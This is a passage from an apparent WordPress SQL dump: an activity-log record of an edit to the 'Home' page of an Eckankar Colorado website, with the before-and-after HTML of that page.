class=\"\" style=\"text-align: center; border-width: 0px; font-size: 27px; line-height: 46px; color: #f28a27; margin-top: 21px;\" data-font-weight=\"600\">Subscribe Today!</h4>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-size: 18px; color: #333333;\">Sign up to receive your local Public Newsletter!<br>\r\nGet all the latest news and events<br>\r\nfrom around the state.</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 16px;\"><strong>(Initiate Subscriptions are available in the</strong> <a class=\"\" href=\"https://demo2.cloudwp.dev/trial-78x6yt23/initiate-page/\">Initiate Area</a><strong>)</strong></p>\r\n<p style=\"text-align: center; margin-top: 25px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\">Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(231565,39185,'_message_key','post_updated'),(231566,39185,'_user_id','2'),(231567,39185,'_user_login','S8zhaBda'),(231568,39185,'_user_email','nada@zipnadanot.org'),(231569,39185,'_server_remote_addr','76.130.120.x'),(231570,39185,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=7160&action=edit'),(231571,39186,'post_id','7160'),(231572,39186,'post_type','page'),(231573,39186,'post_title','Home'),(231574,39186,'post_prev_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px;\" data-font-weight=\"600\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 33px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: \'Raleway\'; font-weight: 600; color: #697085; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 23px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"border-width: 0px; padding: 0em 1%;\">\r\n<div class=\"bg-video bg-video-1\" data-imhwpb-draggable=\"true\" style=\"border-width: 0px;\">\r\n<p>[embed height=\"315\" width=\"560\"]https://youtu.be/s78XVcM7HWI[/embed]</p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6 bg-alpha-491\" style=\"border-width: 0px; padding-bottom: 0em; margin-bottom: 5px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\'); background-size: cover; background-position: 50% 50%;\" data-alpha=\"0.38\" data-bg-uuid=\"bg-alpha-491\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\">\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; margin-top: 17px;\"><img class=\"alignright wp-image-268059 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-lg-2-1.png\" alt=\"\" width=\"317\" height=\"260\"></p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 38px; line-height: 28px; font-family: \'Raleway\'; font-weight: 500; margin-top: 24px; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Free</p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 37px; line-height: 31px; font-family: \'Raleway\'; font-weight: bold; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"700\" data-font-style=\"\">ECK Books</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; padding: 0%; margin-left: 6px; color: #615b5b; line-height: 22px; margin-top: 16px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">The free-book offer includes two titles:</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-weight: 600; font-size: 18px; margin-left: 6px; color: #615b5b; line-height: 23px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\"><em>ECKANKAR—Ancient Wisdom for Today</em> and <em>Is Life a Random Walk? <br>\r\n<br>\r\n</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\">\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"\">\r\n<h3 class=\"\"><img class=\"aligncenter wp-image-268029 size-full bg-img\" style=\"margin-top: -11px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/meetup-wide-2.png\" alt=\"\" width=\"564\" height=\"258\"></h3>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 18px; font-weight: 400; text-align: center; color: #333333;\" data-font-family=\"\" data-font-weight=\"400\" data-font-style=\"\">These Colorado discussion groups are open to everyone.<br>\r\nShare or listen to spiritual experiences and insights.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"font-size: 15px;\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"bg-box\">\r\n<h4 class=\"\"><img class=\"bg-img alignnone wp-image-268201 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/newsletter-lg-1.png\" alt=\"\" width=\"564\" height=\"91\"></h4>\r\n<h4 class=\"\" style=\"text-align: center; border-width: 0px; font-size: 27px; line-height: 46px; color: #f28a27; margin-top: 21px;\" data-font-weight=\"600\">Subscribe Today!</h4>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-size: 18px; color: #333333;\">Sign up to receive your local Public Newsletter!<br>\r\nGet all the latest news and events<br>\r\nfrom around the state.</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 16px;\"><strong>(Initiate Subscriptions are available in the</strong> <a class=\"\" href=\"https://demo2.cloudwp.dev/trial-78x6yt23/initiate-page/\">Initiate Area</a><strong>)</strong></p>\r\n<p style=\"text-align: center; margin-top: 25px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\">Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(231575,39186,'post_new_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px;\" data-font-weight=\"600\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\"></div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 33px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 